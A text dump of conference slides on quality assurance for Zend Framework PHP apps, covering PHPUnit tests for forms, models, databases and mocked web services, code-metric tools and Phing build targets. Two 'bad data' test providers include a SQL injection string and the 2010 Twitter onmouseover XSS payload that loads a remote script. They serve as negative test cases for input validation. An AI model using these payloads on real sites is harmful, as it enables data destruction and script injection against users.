  • 59. TestHelper.php <?php // set our app paths and environments define('BASE_PATH', realpath(dirname(__FILE__) . '/../')); define('APPLICATION_PATH', BASE_PATH . '/application'); define('TEST_PATH', BASE_PATH . '/tests'); define('APPLICATION_ENV', 'testing'); // Include path set_include_path( . PATH_SEPARATOR . BASE_PATH . '/library' . PATH_SEPARATOR . get_include_path() ); // Set the default timezone !!! date_default_timezone_set('Europe/Brussels'); // We wanna catch all errors en strict warnings error_reporting(E_ALL|E_STRICT); require_once 'Zend/Application.php'; $application = new Zend_Application( APPLICATION_ENV, APPLICATION_PATH . '/configs/application.ini' ); $application->bootstrap();
  • 60. Zend_Tool since 1.11.4 • provides • phpunit.xml • bootstrap.php • IndexControllerTest.php Ralph Schindler
  • 64. Start with the test <?php class Application_Form_CommentFormTest extends PHPUnit_Framework_TestCase { protected $_form; protected function setUp() { $this->_form = new Application_Form_CommentForm(); parent::setUp(); } protected function tearDown() { parent::tearDown(); $this->_form = null; } }
  • 65. The good stuff public function goodData() { return array ( array ('John Doe', '', '', 'test comment'), array ("Matthew Weier O'Phinney", '', '', 'Doing an MWOP-Test'), array ('D. Keith Casey, Jr.', '', '', 'Doing a monkey dance'), ); } /** * @dataProvider goodData */ public function testFormAcceptsValidData($name, $email, $web, $comment) { $data = array ( 'name' => $name, 'mail' => $mail, 'web' => $web, 'comment' => $comment, ); $this->assertTrue($this->_form->isValid($data)); }
  • 68. In the news… Is this YOU?!?
  • 69. The bad stuff public function badData() { return array ( array ('','','',''), array ("Robert'; DROP TABLES comments; --", '', '','Little Bobby Tables'), array (str_repeat('x', 100000), '', '', ''), array ('John Doe', '', ""style="font-size:999999999999px;"onmouseover= "$.getScript('http:u002fu002fis.gdu002ffl9A7')"/", 'exploit twitter 9/21/2010'), ); } /** * @dataProvider badData */ public function testFormRejectsBadData($name, $email, $web, $comment) { $data = array ( 'name' => $name, 'mail' => $mail, 'web' => $web, 'comment' => $comment, ); $this->assertFalse($this->_form->isValid($data)); }
  • 70. Create the form class <?php class Application_Form_CommentForm extends Zend_Form { public function init() { /* Form Elements & Other Definitions Here ... */ } }
  • 72. Let’s put in our elements <?php class Application_Form_CommentForm extends Zend_Form { public function init() { $this->addElement('text', 'name', array ( 'Label' => 'Name', 'Required' => true)); $this->addElement('text', 'mail', array ( 'Label' => 'E-mail Address', 'Required' => true)); $this->addElement('text', 'web', array ( 'Label' => 'Website', 'Required' => false)); $this->addElement('textarea', 'comment', array ( 'Label' => 'Comment', 'Required' => true)); $this->addElement('submit', 'post', array ( 'Label' => 'Post', 'Ignore' => true)); } }
  • 74. Filter -Validate $this->addElement('text', 'name', array ( 'Label' => 'Name', 'Required' => true, 'Filters' => array ('StringTrim', 'StripTags'), 'Validators' => array ( new Zftest_Validate_Mwop(), new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50))), )); $this->addElement('text', 'mail', array ( 'Label' => 'E-mail Address', 'Required' => true, 'Filters' => array ('StringTrim', 'StripTags', 'StringToLower'), 'Validators' => array ( new Zend_Validate_EmailAddress(), new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50))), )); $this->addElement('text', 'web', array ( 'Label' => 'Website', 'Required' => false, 'Filters' => array ('StringTrim', 'StripTags', 'StringToLower'), 'Validators' => array ( new Zend_Validate_Callback(array('Zend_Uri', 'check')), new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50))), )); $this->addElement('textarea', 'comment', array ( 'Label' => 'Comment', 'Required' => true, 'Filters' => array ('StringTrim', 'StripTags'), 'Validators' => array ( new Zftest_Validate_TextBox(), new Zend_Validate_StringLength(array ('max' => 5000))), ));
  • 75. Green, warm & fuzzy
  • 76. You’re a winner! ☑ quality code ☑ tested ☑ secure ☑ reusable
  • 78. Testing business logic • models contain logic - tied to your business - tied to your storage - tied to your resources • no “one size fits all” solution
  • 79. Type: data containers • contains structured data - populated through setters and getters • perform logic tied to it’s purpose - transforming data - filtering data - validating data • can convert into other data types - arrays - strings (JSON, serialized, xml, …) • are providers to other models
  • 81. Writing model test <?php class Application_Model_CommentTest extends PHPUnit_Framework_TestCase { protected $_comment; protected function setUp() { $this->_comment = new Application_Model_Comment(); parent::setUp(); } protected function tearDown() { parent::tearDown(); $this->_comment = null; } public function testModelIsEmptyAtConstruct() { $this->assertSame(0, $this->_comment->getId()); $this->assertNull($this->_comment->getFullName()); $this->assertNull($this->_comment->getEmailAddress()); $this->assertNull($this->_comment->getWebsite()); $this->assertNull($this->_comment->getComment()); } }
  • 83. Create a simple model <?php class Application_Model_Comment { protected $_id = 0; protected $_fullName; protected $_emailAddress; protected $_website; protected $_comment; public function setId($id) { $this->_id = (int) $id; return $this; } public function getId() { return $this->_id; } public function setFullName($fullName) { $this->_fullName = (string) $fullName; return $this; } public function getFullName() { return $this->_fullName; } public function setEmailAddress($emailAddress) { $this->_emailAddress = (string) $emailAddress; return $this; } public function getEmailAddress() { return $this->_emailAddress; } public function setWebsite($website) { $this->_website = (string) $website; return $this; } public function getWebsite() { return $this->_website; } public function setComment($comment) { $this->_comment = (string) $comment; return $this; } public function getComment() { return $this->_comment; } public function populate($row) { if (is_array($row)) { $row = new ArrayObject($row, ArrayObject::ARRAY_AS_PROPS); } if (isset ($row->id)) $this->setId($row->id); if (isset ($row->fullName)) $this->setFullName($row->fullName); if (isset ($row->emailAddress)) $this->setEmailAddress($row->emailAddress); if (isset ($row->website)) $this->setWebsite($row->website); if (isset ($row->comment)) $this->setComment($row->comment); } public function toArray() { return array ( 'id' => $this->getId(), 'fullName' => $this->getFullName(), 'emailAddress' => $this->getEmailAddress(), 'website' => $this->getWebsite(), 'comment' => $this->getComment(), ); } }
  • 84. We pass the test…
  • 86. Not all data from user input! • model can be populated from - users through the form - data stored in the database - a webservice (hosted by us or others) • simply test it - by using same test scenario’s from our form
  • 88. The good stuff public function goodData() { return array ( array ('John Doe', '', '', 'test comment'), array ("Matthew Weier O'Phinney", '', '', 'Doing an MWOP-Test'), array ('D. Keith Casey, Jr.', '', '', 'Doing a monkey dance'), ); } /** * @dataProvider goodData */ public function testModelAcceptsValidData($name, $mail, $web, $comment) { $data = array ( 'fullName' => $name, 'emailAddress' => $mail, 'website' => $web, 'comment' => $comment, ); try { $this->_comment->populate($data); } catch (Zend_Exception $e) { $this->fail('Unexpected exception should not be triggered'); } $data['id'] = 0; $data['emailAddress'] = strtolower($data['emailAddress']); $data['website'] = strtolower($data['website']); $this->assertSame($this->_comment->toArray(), $data); }
  • 89. The bad stuff public function badData() { return array ( array ('','','',''), array ("Robert'; DROP TABLES comments; --", '', '','Little Bobby Tables'), array (str_repeat('x', 1000), '', '', ''), array ('John Doe', '', ""style="font-size:999999999999px; "onmouseover="$.getScript('http:u002fu002fis.gdu002ffl9A7')"/", 'exploit twitter 9/21/2010'), ); } /** * @dataProvider badData */ public function testModelRejectsBadData($name, $mail, $web, $comment) { $data = array ( 'fullName' => $name, 'emailAddress' => $mail, 'website' => $web, 'comment' => $comment, ); try { $this->_comment->populate($data); } catch (Zend_Exception $e) { return; } $this->fail('Expected exception should be triggered'); }
  • 91. Modify our model protected $_filters; protected $_validators; public function __construct($params = null) { $this->_filters = array ( 'id' => array ('Int'), 'fullName' => array ('StringTrim', 'StripTags', new Zend_Filter_Alnum(true)), 'emailAddress' => array ('StringTrim', 'StripTags', 'StringToLower'), 'website' => array ('StringTrim', 'StripTags', 'StringToLower'), 'comment' => array ('StringTrim', 'StripTags'), ); $this->_validators = array ( 'id' => array ('Int'), 'fullName' => array ( new Zftest_Validate_Mwop(), new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50)), ), 'emailAddress' => array ( 'EmailAddress', new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50)), ), 'website' => array ( new Zend_Validate_Callback(array('Zend_Uri', 'check')), new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50)), ), 'comment' => array ( new Zftest_Validate_TextBox(), new Zend_Validate_StringLength(array ('max' => 5000)), ), ); if (null !== $params) { $this->populate($params); } }
  • 92. Modify setters: Id & name public function setId($id) { $input = new Zend_Filter_Input($this->_filters, $this->_validators); $input->setData(array ('id' => $id)); if (!$input->isValid('id')) { throw new Zend_Exception('Invalid ID provided'); } $this->_id = (int) $input->id; return $this; } public function setFullName($fullName) { $input = new Zend_Filter_Input($this->_filters, $this->_validators); $input->setData(array ('fullName' => $fullName)); if (!$input->isValid('fullName')) { throw new Zend_Exception('Invalid fullName provided'); } $this->_fullName = (string) $input->fullName; return $this; }
  • 93. Email & website public function setEmailAddress($emailAddress) { $input = new Zend_Filter_Input($this->_filters, $this->_validators); $input->setData(array ('emailAddress' => $emailAddress)); if (!$input->isValid('emailAddress')) { throw new Zend_Exception('Invalid emailAddress provided'); } $this->_emailAddress = (string) $input->emailAddress; return $this; } public function setWebsite($website) { $input = new Zend_Filter_Input($this->_filters, $this->_validators); $input->setData(array ('website' => $website)); if (!$input->isValid('website')) { throw new Zend_Exception('Invalid website provided'); } $this->_website = (string) $input->website; return $this; }
  • 94. and comment public function setComment($comment) { $input = new Zend_Filter_Input($this->_filters, $this->_validators); $input->setData(array ('comment' => $comment)); if (!$input->isValid('comment')) { throw new Zend_Exception('Invalid comment provided'); } $this->_comment = (string) $input->comment; return $this; }
  • 97. Integration Testing • database specific functionality - triggers - constraints - stored procedures - sharding/scalability • data input/output - correct encoding of data - transactions execution and rollback
  • 98. Points of concern • beware of automated data types - auto increment sequence ID’s - default values like CURRENT_TIMESTAMP • beware of time related issues - timestamp vs. datetime - UTC vs. local time
  • 99. The domain Model • Model object • Mapper object • Table gateway object Read more about it ☞
  • 100. Change our test class class Application_Model_CommentTest extends PHPUnit_Framework_TestCase becomes class Application_Model_CommentTest extends Zend_Test_PHPUnit_DatabaseTestCase
  • 101. Setting DB Testing up protected $_connectionMock; public function getConnection() { if (null === $this->_dbMock) { $this->bootstrap = new Zend_Application( APPLICATION_ENV, APPLICATION_PATH . '/configs/application.ini'); $this->bootstrap->bootstrap('db'); $db = $this->bootstrap->getBootstrap()->getResource('db'); $this->_connectionMock = $this->createZendDbConnection( $db, 'zftest' ); return $this->_connectionMock; } } public function getDataSet() { return $this->createFlatXmlDataSet( realpath(APPLICATION_PATH . '/../tests/_files/initialDataSet.xml')); }
  • 102. initialDataSet.xml <?xml version="1.0" encoding="UTF-8"?> <dataset> <comment id="1" fullName="B.A. Baracus" emailAddress="" website="" comment="I pitty the fool that doesn't test!"/> <comment id="2" fullName="Martin Fowler" emailAddress="" website="" comment="Models are not right or wrong; they are more or less useful."/> </dataset>
  • 103. Testing SELECT public function testDatabaseCanBeRead() { $ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet( $this->getConnection()); $ds->addTable('comment', 'SELECT * FROM `comment`'); $expected = $this->createFlatXMLDataSet( APPLICATION_PATH . '/../tests/_files/selectDataSet.xml'); $this->assertDataSetsEqual($expected, $ds); }
  • 104. selectDataSet.xml <?xml version="1.0" encoding="UTF-8"?> <dataset> <comment id="1" fullName="B.A. Baracus" emailAddress="" website="" comment="I pitty the fool that doesn't test!"/> <comment id="2" fullName="Martin Fowler" emailAddress="" website="" comment="Models are not right or wrong; they are more or less useful."/> </dataset>
  • 105. Testing UPDATE public function testDatabaseCanBeUpdated() { $comment = new Application_Model_Comment(); $mapper = new Application_Model_CommentMapper(); $mapper->find(1, $comment); $comment->setComment('I like you picking up the challenge!'); $mapper->save($comment); $ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet( $this->getConnection()); $ds->addTable('comment', 'SELECT * FROM `comment`'); $expected = $this->createFlatXMLDataSet( APPLICATION_PATH . '/../tests/_files/updateDataSet.xml'); $this->assertDataSetsEqual($expected, $ds); }
  • 106. updateDataSet.xml <?xml version="1.0" encoding="UTF-8"?> <dataset> <comment id="1" fullName="B.A. Baracus" emailAddress="" website="" comment="I like you picking up the challenge!"/> <comment id="2" fullName="Martin Fowler" emailAddress="" website="" comment="Models are not right or wrong; they are more or less useful."/> </dataset>
  • 107. Testing DELETE public function testDatabaseCanDeleteAComment() { $comment = new Application_Model_Comment(); $mapper = new Application_Model_CommentMapper(); $mapper->find(1, $comment) ->delete($comment); $ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet( $this->getConnection()); $ds->addTable('comment', 'SELECT * FROM `comment`'); $expected = $this->createFlatXMLDataSet( APPLICATION_PATH . '/../tests/_files/deleteDataSet.xml'); $this->assertDataSetsEqual($expected, $ds); }
  • 108. deleteDataSet.xml <?xml version="1.0" encoding="UTF-8"?> <dataset> <comment id="2" fullName="Martin Fowler" emailAddress="" website="" comment="Models are not right or wrong; they are more or less useful."/> </dataset>
  • 109. Testing INSERT public function testDatabaseCanAddAComment() { $comment = new Application_Model_Comment(); $comment->setFullName('Michelangelo van Dam') ->setEmailAddress('') ->setWebsite('') ->setComment('Unit Testing, It is so addictive!!!'); $mapper = new Application_Model_CommentMapper(); $mapper->save($comment); $ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet( $this->getConnection()); $ds->addTable('comment', 'SELECT * FROM `comment`'); $expected = $this->createFlatXMLDataSet( APPLICATION_PATH . '/../tests/_files/addDataSet.xml'); $this->assertDataSetsEqual($expected, $ds); }
  • 110. insertDataSet.xml <?xml version="1.0" encoding="UTF-8"?> <dataset> <comment id="1" fullName="B.A. Baracus" emailAddress="" website="" comment="I pitty the fool that doesn't test!"/> <comment id="2" fullName="Martin Fowler" emailAddress="" website="" comment="Models are not right or wrong; they are more or less useful."/> <comment id="3" fullName="Michelangelo van Dam" emailAddress="" website="" comment="Unit Testing, It is so addictive!!!"/> </dataset>
  • 112. What went wrong here?
  • 114. Testing INSERT w/ filter public function testDatabaseCanAddAComment() { $comment = new Application_Model_Comment(); $comment->setFullName('Michelangelo van Dam') ->setEmailAddress('') ->setWebsite('') ->setComment('Unit Testing, It is so addictive!!!'); $mapper = new Application_Model_CommentMapper(); $mapper->save($comment); $ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet( $this->getConnection()); $ds->addTable('comment', 'SELECT * FROM `comment`'); $filteredDs = new PHPUnit_Extensions_Database_DataSet_DataSetFilter( $ds, array ('comment' => array ('id'))); $expected = $this->createFlatXMLDataSet( APPLICATION_PATH . '/../tests/_files/addDataSet.xml'); $this->assertDataSetsEqual($expected, $filteredDs); }
  • 115. insertDataSet.xml <?xml version="1.0" encoding="UTF-8"?> <dataset> <comment fullName="B.A. Baracus" emailAddress="" website="" comment="I pitty the fool that doesn't test!"/> <comment fullName="Martin Fowler" emailAddress="" website="" comment="Models are not right or wrong; they are more or less useful."/> <comment fullName="Michelangelo van Dam" emailAddress="" website="" comment="Unit Testing, It is so addictive!!!"/> </dataset>
  • 118. Web services remarks • you need to comply with an API - that will be your reference • you cannot always make a test-call - paid services per call - test environment is “offline” - network related issues
  • 121. JoindinTest <?php class Zftest_Service_JoindinTest extends PHPUnit_Framework_TestCase { protected $_joindin; protected $_settings; protected function setUp() { $this->_joindin = new Zftest_Service_Joindin(); $settings = simplexml_load_file(realpath( APPLICATION_PATH . '/../tests/_files/settings.xml')); $this->_settings = $settings->joindin; parent::setUp(); } protected function tearDown() { parent::tearDown(); $this->_joindin = null; } }
  • 122. JoindinTest public function testJoindinCanGetUserDetails() { $expected = '<?xml version="1.0"?><response><item><username>DragonBe</ username><full_name>Michelangelo van Dam</full_name><ID>19</ ID><last_login>1303248639</last_login></item></response>'; $this->_joindin->setUsername($this->_settings->username) ->setPassword($this->_settings->password); $actual = $this->_joindin->user()->getDetail(); $this->assertXmlStringEqualsXmlString($expected, $actual); } public function testJoindinCanCheckStatus() { $date = new DateTime(); $date->setTimezone(new DateTimeZone('UTC')); $expected = '<?xml version="1.0"?><response><dt>' . $date->format('r') . '</dt><test_string>testing unit test</test_string></response>'; $actual = $this->_joindin->site()->getStatus('testing unit test'); $this->assertXmlStringEqualsXmlString($expected, $actual); }
  • 124. Euh… what? 1) Zftest_Service_JoindinTest::testJoindinCanGetUserDetails Failed asserting that two strings are equal. --- Expected +++ Actual @@ @@ <ID>19</ID> - <last_login>1303248639</last_login> + <last_login>1303250271</last_login> </item> </response> I recently logged in ✔
  • 125. And this? 2) Zftest_Service_JoindinTest::testJoindinCanCheckStatus Failed asserting that two strings are equal. --- Expected +++ Actual @@ @@ <?xml version="1.0"?> <response> - <dt>Tue, 19 Apr 2011 22:26:40 +0000</dt> + <dt>Tue, 19 Apr 2011 22:26:41 +0000</dt> <test_string>testing unit test</test_string> </response> Latency of the network 1s !
  • 128. JoindinTest <?php class Zftest_Service_JoindinTest extends PHPUnit_Framework_TestCase { protected $_joindin; protected $_settings; protected function setUp() { $this->_joindin = new Zftest_Service_Joindin(); $client = new Zend_Http_Client(); $client->setAdapter(new Zend_Http_Client_Adapter_Test()); $this->_joindin->setClient($client); $settings = simplexml_load_file(realpath( APPLICATION_PATH . '/../tests/_files/settings.xml')); $this->_settings = $settings->joindin; parent::setUp(); } protected function tearDown() { parent::tearDown(); $this->_joindin = null; } }
  • 129. JoindinUserMockTest public function testJoindinCanGetUserDetails() { $response = <<<EOS HTTP/1.1 200 OK Content-type: text/xml <?xml version="1.0"?> <response> <item> <username>DragonBe</username> <full_name>Michelangelo van Dam</full_name> <ID>19</ID> <last_login>1303248639</last_login> </item> </response> EOS; $client = $this->_joindin->getClient()->getAdapter()->setResponse($response); $expected = '<?xml version="1.0"?><response><item><username>DragonBe</ username><full_name>Michelangelo van Dam</full_name><ID>19</ID><last_login>1303248639</ last_login></item></response>'; $this->_joindin->setUsername($this->_settings->username) ->setPassword($this->_settings->password); $actual = $this->_joindin->user()->getDetail(); $this->assertXmlStringEqualsXmlString($expected, $actual); }
  • 130. JoindinStatusMockTest public function testJoindinCanCheckStatus() { $date = new DateTime(); $date->setTimezone(new DateTimeZone('UTC')); $response = <<<EOS HTTP/1.1 200 OK Content-type: text/xml <?xml version="1.0"?> <response> <dt>{$date->format('r')}</dt> <test_string>testing unit test</test_string> </response> EOS; $client = $this->_joindin->getClient() ->getAdapter()->setResponse($response); $expected = '<?xml version="1.0"?><response><dt>' . $date->format('r') . '</dt><test_string>testing unit test</test_string></response>'; $actual = $this->_joindin->site()->getStatus('testing unit test'); $this->assertXmlStringEqualsXmlString($expected, $actual); }
  • 134. Setting up ControllerTest <?php class IndexControllerTest extends Zend_Test_PHPUnit_ControllerTestCase { public function setUp() { $this->bootstrap = new Zend_Application( APPLICATION_ENV, APPLICATION_PATH . '/configs/application.ini'); parent::setUp(); } }
  • 135. Testing if form is on page public function testIndexAction() { $params = array( 'action' => 'index', 'controller' => 'index', 'module' => 'default' ); $url = $this->url($this->urlizeOptions($params)); $this->dispatch($url); // assertions $this->assertModule($params['module']); $this->assertController($params['controller']); $this->assertAction($params['action']); $this->assertQueryContentContains( 'h1#pageTitle', 'Please leave a comment'); $this->assertQueryCount('form#commentForm', 1); }
  • 136. Test processing public function testProcessAction() { $testData = array ( 'name' => 'testUser', 'mail' => '', 'web' => '', 'comment' => 'This is a test comment', ); $params = array('action' => 'process', 'controller' => 'index', 'module' => 'default'); $url = $this->url($this->urlizeOptions($params)); $this->request->setMethod('post'); $this->request->setPost($testData); $this->dispatch($url); // assertions $this->assertModule($params['module']); $this->assertController($params['controller']); $this->assertAction($params['action']); $this->assertResponseCode(302); $this->assertRedirectTo('/index/success'); $this->resetRequest(); $this->resetResponse(); $this->dispatch('/index/success'); $this->assertQueryContentContains('span#fullName', $testData['name']); }
  • 137. REMARK • data providers can be used - to test valid data - to test invalid data • but we know it’s taken care of our model - just checking for error messages in form
  • 138. Test if we hit home public function testSuccessAction() { $params = array( 'action' => 'success', 'controller' => 'index', 'module' => 'default' ); $url = $this->url($this->urlizeOptions($params)); $this->dispatch($url); // assertions $this->assertModule($params['module']); $this->assertController($params['controller']); $this->assertAction($params['action']); $this->assertRedirectTo('/'); }
  • 144. • unit testing is simple • combine integration tests with unit tests • test what counts • mock out what’s remote
  • 148. Questions • how stable is my code? • how flexible is my code? • how complex is my code? • how easy can I refactor my code?
  • 149. Answers • PHPDepend - Dependency calculations • PHPMD - Mess detections and code “smells” • PHPCPD - Copy/paste detection • PHPCS - PHP_CodeSniffer
  • 151. What? • generates metrics • measure health • identify parts to improve (refactor)
  • 153. • CYCLO: Cyclomatic Complexity • LOC: Lines of Code • NOM: Number of Methods • NOC: Number of Classes • NOP: Number of Packages • AHH:Average Hierarchy Height • ANDC:Average Number of Derived Classes • FANOUT: Number of Called Classes • CALLS: Number of Operation Calls
  • 154. Cyclomatic Complexity • metric calculation • execution paths • independent control structures - if, else, for, foreach, switch case, while, do, … • within a single method or function • more info - Cyclomatic_complexity
  • 155. Average Hierarchy Height The average of the maximum length from a root class to its deepest subclass
  • 156. pdepend pyramid Inheritance few classes derived from other classes lots of classes inherit from other classes
  • 160. pdepend-graph graph  about  stability:  a  mix  between  abstract  and  concrete  classes
  • 161.
  • 162.
  • 165. What? • detects code smells - possible bugs - sub-optimal code - over complicated expressions - unused parameters, methods and properties - wrongly named parameters, methods or properties
  • 168. What? • detects similar code snippets - plain copy/paste work - similar code routines • indicates problems - maintenance hell - downward spiral of disasters • stimulates improvements - refactoring of code - moving similar code snippets in common routines
  • 170. Required evil • validates coding standards - consistency - readability • set as a policy for development • reports failures to meet the standard - sometimes good: parentheses on wrong line - mostly bad: line exceeds 80 characters ❖ but needed for terminal viewing of code • can be set as pre-commit hook - but can cause frustration!!!
  • 174. Key reason “computers are great at doing repetitive tasks very well”
  • 175. Repetition • syntax checking • documenting • testing • measuring
  • 176.
  • 177. Why Phing? • php based (it’s already on our system) • open-source • supported by many tools • very simple syntax • great documentation
  • 178. Structure of a build <?xml version="1.0" encoding="UTF-8"?> <project name="Application build" default="phplint"> <!-- set global and local properties --> <property file="" /> <property file="" override="true" /> <!-- define our code base files --> <fileset dir="${project.basedir}" id="phpfiles"> <include name="application/**/*.php" /> <include name="library/In2it/**/*.php" /> </fileset> <!-- let’s validate the syntax of our code base --> <target name="phplint" description="Validating PHP Syntax"> <phplint haltonfailure="true"> <fileset refid="phpfiles" /> </phplint> </target> </project>
  • 179. <?xml version="1.0" encoding="UTF-8"?> <project name="Application build" default="phplint"> <!-- set global and local properties --> <property file=""/> <property file="" override="true" /> <!-- define our code base files --> <fileset dir="${project.basedir}" id="phpfiles"> <include name="application/**/*.php" /> <include name="library/In2it/**/*.php" /> </fileset> <!-- let’s validate the syntax of our code base --> <target name="phplint" description="Validating PHP Syntax"> <phplint haltonfailure="true"> <fileset refid="phpfiles" /> </phplint> </target> </project> Structure of a build <project name="Application build" default="phplint">
  • 180. <?xml version="1.0" encoding="UTF-8"?> <project name="Application build" default="phplint"> <!-- set global and local properties --> <property file=""/> <property file="" override="true" /> <!-- define our code base files --> <fileset dir="${project.basedir}" id="phpfiles"> <include name="application/**/*.php" /> <include name="library/In2it/**/*.php" /> </fileset> <!-- let’s validate the syntax of our code base --> <target name="phplint" description="Validating PHP Syntax"> <phplint haltonfailure="true"> <fileset refid="phpfiles" /> </phplint> </target> </project> Structure of a build <!-- set global and local properties --> <property file="" /> <property file="" override="true" />
  • 181. <?xml version="1.0" encoding="UTF-8"?> <project name="Application build" default="phplint"> <!-- set global and local properties --> <property file=""/> <property file="" override="true" /> <!-- define our code base files --> <fileset dir="${project.basedir}" id="phpfiles"> <include name="application/**/*.php" /> <include name="library/In2it/**/*.php" /> </fileset> <!-- let’s validate the syntax of our code base --> <target name="phplint" description="Validating PHP Syntax"> <phplint haltonfailure="true"> <fileset refid="phpfiles" /> </phplint> </target> </project> Structure of a build <!-- define our code base files --> <fileset dir="${project.basedir}" id="phpfiles"> <include name="application/**/*.php" /> <include name="library/In2it/**/*.php" /> </fileset>
  • 182. <?xml version="1.0" encoding="UTF-8"?> <project name="Application build" default="phplint"> <!-- set global and local properties --> <property file=""/> <property file="" override="true" /> <!-- define our code base files --> <fileset dir="${project.basedir}" id="phpfiles"> <include name="application/**/*.php" /> <include name="library/In2it/**/*.php" /> </fileset> <!-- let’s validate the syntax of our code base --> <target name="phplint" description="Validating PHP Syntax"> <phplint haltonfailure="true"> <fileset refid="phpfiles" /> </phplint> </target> </project> Structure of a build <!-- let’s validate the syntax of our code base --> <target name="phplint" description="Validating PHP Syntax"> <phplint haltonfailure="true"> <fileset refid="phpfiles" /> </phplint> </target>
  • 183. <?xml version="1.0" encoding="UTF-8"?> <project name="Application build" default="phplint"> <!-- set global and local properties --> <property file=""/> <property file="" override="true" /> <!-- define our code base files --> <fileset dir="${project.basedir}" id="phpfiles"> <include name="application/**/*.php" /> <include name="library/In2it/**/*.php" /> </fileset> <!-- let’s validate the syntax of our code base --> <target name="phplint" description="Validating PHP Syntax"> <phplint haltonfailure="true"> <fileset refid="phpfiles" /> </phplint> </target> </project> Structure of a build </project>
  • 184. project.title=WeCycle phpbook:qademo dragonbe$ cat # General settings project.title=WeCycle # AB Testing properties abrequests=1000 abconcurrency=10
  • 187. Artifacts • some tools provide output we can use later • called “artifacts” • we need to store them somewhere • so we create a prepare target • that creates these artifact directories (./build) • that gets cleaned every run
  • 188. Prepare for artifacts <target name="prepare" description="Clean up the build path"> <delete dir="${project.basedir}/build" quiet="true" /> <mkdir dir="${project.basedir}/build" /> <mkdir dir="${project.basedir}/build/docs" /> <mkdir dir="${project.basedir}/build/logs" /> <mkdir dir="${project.basedir}/build/coverage" /> <mkdir dir="${project.basedir}/build/pdepend" /> <mkdir dir="${project.basedir}/build/browser" /> </target>
  • 189. phpdoc2 <target name="phpdoc2" description="Generating automated documentation"> <property name="doc.title" value="${project.title} API Documentation"/> <exec command="/usr/bin/phpdoc -d application/,library/In2it -e php -t ${project.basedir}/build/docs --title=&quot;${doc.title}&quot;" dir="${project.basedir}" passthru="true" /> </target>
  • 190. PHPUnit <target name="phpunit" description="Running unit tests"> <exec command="/usr/bin/phpunit --coverage-html ${project.basedir}/build/coverage --coverage-clover ${project.basedir}/build/logs/clover.xml --log-junit ${project.basedir}/build/logs/junit.xml" dir="${project.basedir}/tests" passthru="true" /> </target>
  • 191. PHP_CodeSniffer <target name="phpcs" description="Validate code with PHP CodeSniffer"> <exec command="/usr/bin/phpcs --report=checkstyle --report-file=${project.basedir}/build/logs/checkstyle.xml --standard=Zend --extensions=php application library/In2it" dir="${project.basedir}" passthru="true" /> </target>
  • 192. Copy Paste Detection <target name="phpcpd" description="Detect copy/paste with PHPCPD"> <phpcpd> <fileset refid="phpfiles" /> <formatter type="pmd" outfile="${project.basedir}/build/logs/pmd-cpd.xml" /> </phpcpd> </target>
  • 193. PHP Mess Detection <target name="phpmd" description="Mess detection with PHPMD"> <phpmd> <fileset refid="phpfiles" /> <formatter type="xml" outfile="${project.basedir}/build/logs/pmd.xml" /> </phpmd> </target>
  • 194. PHP Depend <target name="pdepend" description="Dependency calculations with PDepend"> <phpdepend> <fileset refid="phpfiles" /> <logger type="jdepend-xml" outfile="${project.basedir}/build/logs/jdepend.xml" /> <logger type="phpunit-xml" outfile="${project.basedir}/build/logs/phpunit.xml" /> <logger type="summary-xml" outfile="${project.basedir}/build/logs/pdepend-summary.xml" /> <logger type="jdepend-chart" outfile="${project.basedir}/build/pdepend/pdepend.svg" /> <logger type="overview-pyramid" outfile="${project.basedir}/build/pdepend/pyramid.svg" /> </phpdepend> </target>
  • 195. PHP CodeBrowser <target name="phpcb" description="Code browser with PHP_CodeBrowser"> <exec command="/usr/bin/phpcb -l ${project.basedir}/build/logs -S php -o ${project.basedir}/build/browser" dir="${project.basedir}" passthru="true"/> </target>
  • 196. Create a build procedure <target name="build" description="Building app"> <phingCall target="prepare" /> <phingCall target="phplint" /> <phingCall target="phpunit" /> <phingCall target="phpdoc2" /> <phingCall target="phpcs" /> <phingCall target="phpcpd" /> <phingCall target="phpmd" /> <phingCall target="pdepend" /> <phingCall target="phpcb" /> </target>
  • 197. Other things to automate • server stress-testing with Apache Benchmark • database deployment with DBDeploy • package code base with Phar • transfer package to servers with - FTP/SFTP - scp/rsync • execute remote commands with SSH • … so much more
  • 198. Example DBDeploy <target name="dbdeploy" description="Update the DB to the latest version"> <!-- set the path for mysql execution scripts --> <property name="dbscripts.dir" value="${project.basedir}/${dbdeploy.scripts}" /> <!-- process the DB deltas --> <dbdeploy url="mysql:host=${db.hostname};dbname=${db.dbname}" userid="${db.username}" password="${db.password}" dir="${dbscripts.dir}/deltas" outputfile="${dbscripts.dir}/all-deltas.sql" undooutputfile="${dbscripts.dir}/undo-all-deltas.sql"/> <!-- execute deltas --> <pdosqlexec url="mysql:host=${db.hostname};dbname=${db.dbname}" userid="${db.username}" password="${db.password}" src="${dbscripts.dir}/all-deltas.sql"/> </target>
  • 201.
  • 202.
  • 203.
  • 204.
  • 205.
  • 206.
  • 207.
  • 208.
  • 209. Now you are a winner!
  • 211.
  • 212.
  • 213.
  • 214.
  • 215.
  • 217. Get your information in a consistent, automated way and make it accessible for the team More people can better safeguard the code!
  • 219. Recommended  reading • OOD  Quality  Metrics -­‐ Robert  Cecil  Mar@n Free h=p://
  • 222. Credits I’d like to thank the following people for sharing their creative commons pictures michelangelo: birds: safeguarding: bugs: behaviour: prevention: progress: workout: measurement: team spirit: time: continuous reporting: deploy packages: chris hartjes: mount everest: everybody likes this: race cars: protection dog: gears: 1st place: elephpant: